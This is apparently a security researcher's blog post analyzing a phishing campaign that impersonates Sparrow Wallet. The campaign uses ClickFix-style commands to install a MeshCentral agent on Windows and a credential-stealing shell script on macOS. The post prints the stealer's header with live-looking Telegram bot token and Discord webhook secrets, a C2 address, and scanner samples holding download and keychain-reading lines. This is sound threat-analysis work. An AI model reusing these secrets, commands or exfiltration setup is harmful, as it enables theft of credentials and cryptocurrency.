While browsing posts on X, I noticed that a user had shared a phishing email they had received. I decided to investigate and determine what was actually happening.
Pretext
The attack begins with an email sent through SendGrid stating that Sparrow has implemented a 2FA system for accounts. For readers not deeply familiar with the Bitcoin ecosystem, Sparrow Wallet is a widely used self-custody wallet that lets holders manage their assets directly from their computer. It's worth noting that Sparrow doesn't have a login system; it's a client. Minus a few points for the attackers; however, they really don't care.
So what happens when a user visits the site? The user is presented with a popup instructing them to run a script.

This is a ClickFix-style attack. Essentially, attackers have users unknowingly execute system commands, usually to deliver malware payloads to their system. While some systems have implemented some level of warnings or mitigations, the technique can still be quite successful. Reporting just this much would be nearly sufficient as a "hey, threat actors are doing a thing" note, but I also wanted to dive into what's actually happening, what payloads were observed, and so on.
Analyzing the attack
Once a user has connected to the malicious domain at hxxp://sparrowwallet2fa[.]com, it loads a JavaScript file remotely from hxxps://projects2026box[.]com.
When viewing the JavaScript overlay file, we can observe several functions designed to handle payloads for Windows or Mac clients (we'll focus on Windows for a sec). Isolating the Windows branch of the OS handling, we see a const payloadWin=atob() declaration. This instantly tells us that the payload is base64; no guessing required:
Once we have decoded this, we can observe that the payload is having the user execute a PowerShell encoded command:
When decoding the PowerShell encoded command, we observe another PowerShell encoded command, this time, pulling a file from hxxps://cfg[.]bucksittech[.]com/install:
The install file being executed contains another payload that is to be executed on the user's system:
In this case, a .exe file hosted on GitHub (yes, I've already reported this) is downloaded and executed. Looking at the metadata for the exe, we can see this is a MeshCentral agent. MeshCentral is commonly used by threat actors as a command and control (C2) system to control infected victims.
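As an added illustration (not code from the post, and not the campaign's payload), the following Python peels the layered encoding described above: the atob() base64 layer first, then each nested PowerShell -EncodedCommand argument, which is base64 of UTF-16LE text, and finally pulls out defanged URLs for reporting. The sample payload is constructed inline around a benign command and a reserved example.invalid URL.

```python
import base64
import re

ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s'\"<>]+", re.IGNORECASE)


def ps_encode(command: str) -> str:
    """PowerShell's -EncodedCommand takes base64 of the UTF-16LE command text."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def build_sample() -> str:
    """Constructed fixture, not the campaign's payload: a benign stage 3 wrapped in
    two -EncodedCommand layers, then base64'd once more as atob() would receive it."""
    stage3 = "Write-Output 'stage three'; $u = 'https://example.invalid/install'"
    stage2 = "powershell -NoProfile -EncodedCommand " + ps_encode(stage3)
    stage1 = "powershell -w hidden -EncodedCommand " + ps_encode(stage2)
    return base64.b64encode(stage1.encode("ascii")).decode("ascii")


def peel(payload_b64: str, max_depth: int = 10) -> list[str]:
    """Decode the atob() layer, then keep decoding nested -EncodedCommand args.
    Returns every stage in order so each one can be reviewed and reported."""
    stages = [base64.b64decode(payload_b64).decode("utf-8", "replace")]
    while len(stages) < max_depth:
        m = ENC_RE.search(stages[-1])
        if not m:
            break
        stages.append(base64.b64decode(m.group(1)).decode("utf-16-le", "replace"))
    return stages


def defang(url: str) -> str:
    return url.replace("http", "hxxp").replace(".", "[.]")


def extract_urls(stages: list[str]) -> list[str]:
    """Defanged, de-duplicated URLs across all stages (the IoCs worth reporting)."""
    return sorted({defang(u) for s in stages for u in URL_RE.findall(s)})


if __name__ == "__main__":
    decoded = peel(build_sample())
    for i, stage in enumerate(decoded, 1):
        print(f"--- stage {i} ---\n{stage}")
    print("URLs:", extract_urls(decoded))
```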
Malware Observations
Checking sandbox execution, we can see the MeshCentral agent installer:

VirusTotal also noted the following MeshCentral connection info:
{
"Botnet": "sparrow",
"Version": "2",
"MeshID": "0x34AFA6DFF8B6A55987738A24377959EB57D58AAD98A81BB6BD5B9131F0504D682B362D106CBA80599DFEC43A433DD1A5",
"ServerID": "EE9CA1BA70C227202F64427F4A4B1A861E218CC3DB551684C63CFAECE008032136C14AC02F4DB41CB1EC1502529F3AB7",
"C2": "wss://rmm.bucksittech[.]com:443/agent.ashx"
}
Burning More Configs
While MeshCentral's behavior is well documented, the Mac variant of this attack leverages an (arguably) nastier shell script. This differs from the Windows counterpart, which joins you to a botnet. Within the overlay JavaScript file, there's a reference to a captchaverify_74946461.applescript file. This was the file being loaded in the screenshot at the top of the blog.
The AppleScript itself is straightforward and loads more base64-encoded commands:
After decoding the base64, we can observe the following curl request that downloads a shell script from hxxps://projects2026box[.]com/serve_site/captchaverify_74946461.sh:
The contents of the shell script are quite interesting. The first few lines divulge that the threat actor has also set up Telegram and Discord for C2/exfiltration activity:
#!/bin/bash
umask 077
TG_TOKEN="8613335985:AAE9Y6PCWaVY3teQlviHeF5P5rvOIHKNkew"
TG_CHAT="8635002848"
DISCORD_WEBHOOK="https://discord.com/api/webhooks/1498289000006549595/Tuc4dBDDqilyRU8fwmEku4uJqF3y1fhah23G29QN-KPDIU9heAAfVpcFMWuJGibXCi6Z"
Continuing down the script, we can see that it's set to download a syshelper file from the same host that has the shell scripts:

Aside from installing syshelper, the script sets up theft of keychain data, browser data, cryptocurrency wallets, SSH keys, and Apple Notes, and also checks for several specific files to steal:
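A defender reviewing a script like this wants the exfiltration channels and staging behaviour flagged without copying live secrets into a report. The following Python scanner is an added example (not from the post or the campaign) that matches the indicators the post describes, a Telegram bot token, a Discord webhook, a curl download of a helper into /tmp, and keychain references, and redacts the secret portion; the sample script is constructed with placeholder values.

```python
import re
from dataclasses import dataclass

# Indicators drawn from what the post describes: a Telegram bot token
# ("<bot id>:<35-char secret>"), a Discord webhook (secret in the URL),
# a curl download of a helper into /tmp, and keychain references.
PATTERNS = {
    "telegram_bot_token": re.compile(r"\b(\d{8,10}):([A-Za-z0-9_-]{35})\b"),
    "discord_webhook": re.compile(
        r"https://discord(?:app)?\.com/api/webhooks/(\d+)/([A-Za-z0-9_-]+)"),
    "curl_to_tmp": re.compile(r"\bcurl\b.*\s-o\s+/tmp/\S+"),
    "keychain_reference": re.compile(r"Library/Keychains|\bsecurity\s+(?:find|dump)-"),
}
SECRET_KINDS = ("telegram_bot_token", "discord_webhook")

# Constructed sample script with placeholder values, not the campaign's real file.
SAMPLE_SCRIPT = "\n".join([
    "#!/bin/bash",
    "umask 077",
    'TG_TOKEN="0000000000:' + "A" * 35 + '"',
    'TG_CHAT="0000000000"',
    'DISCORD_WEBHOOK="https://discord.com/api/webhooks/000000000000000000/PLACEHOLDER_SECRET"',
    "curl -fsSL https://example.invalid/serve_site/syshelper -o /tmp/syshelper",
    'ls "$HOME/Library/Keychains" > /tmp/k.txt',
])


@dataclass
class Finding:
    line: int
    kind: str
    evidence: str  # secret portion redacted so the report can be shared safely


def redact(secret: str) -> str:
    return secret[:4] + "*" * (len(secret) - 4)


def scan(script: str) -> list[Finding]:
    """Line-by-line scan; one finding per matching pattern per line."""
    findings = []
    for no, line in enumerate(script.splitlines(), 1):
        for kind, rx in PATTERNS.items():
            m = rx.search(line)
            if m:
                evidence = m.group(0)
                if kind in SECRET_KINDS:
                    evidence = evidence.replace(m.group(2), redact(m.group(2)))
                findings.append(Finding(no, kind, evidence))
    return findings


def exfil_channels(findings: list[Finding]) -> list[str]:
    """Which of the described exfiltration channels the script configures."""
    return sorted({f.kind for f in findings if f.kind in SECRET_KINDS})
```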


Telegram
Given that we have the Telegram token, we can pull some of the bot's information. So, what/who is our bot?
The bot's name is @Bashstolebot (clever). We can also see that it has a chat with a member @macmalta.
We can see this confirmed within the membership information:
Closing
This campaign highlights how modern phishing attacks have evolved into cross-platform malware delivery operations. By impersonating Sparrow Wallet and abusing a fake 2FA notification, the attackers used a ClickFix-style technique to trick users into manually executing malicious commands. The investigation uncovered a multi-stage infection chain involving Base64-encoded PowerShell payloads, remote script execution, and the deployment of MeshCentral agents for persistent remote access on Windows systems. The macOS variant expanded further into credential theft, cryptocurrency wallet theft, browser data harvesting, and exfiltration through Telegram and Discord infrastructure.
Although parts of the campaign are no longer active, the tactics remain highly relevant. The attackers leveraged legitimate platforms such as GitHub and common remote management tools to blend malicious activity with normal traffic, demonstrating how threat actors increasingly rely on trusted services to evade detection. Ultimately, this campaign reinforces a simple but critical lesson: users should never execute scripts or commands provided by websites or unsolicited emails without verifying their legitimacy.
I wish I had more time to keep going through all of this data. Be safe out there,
-Synfinner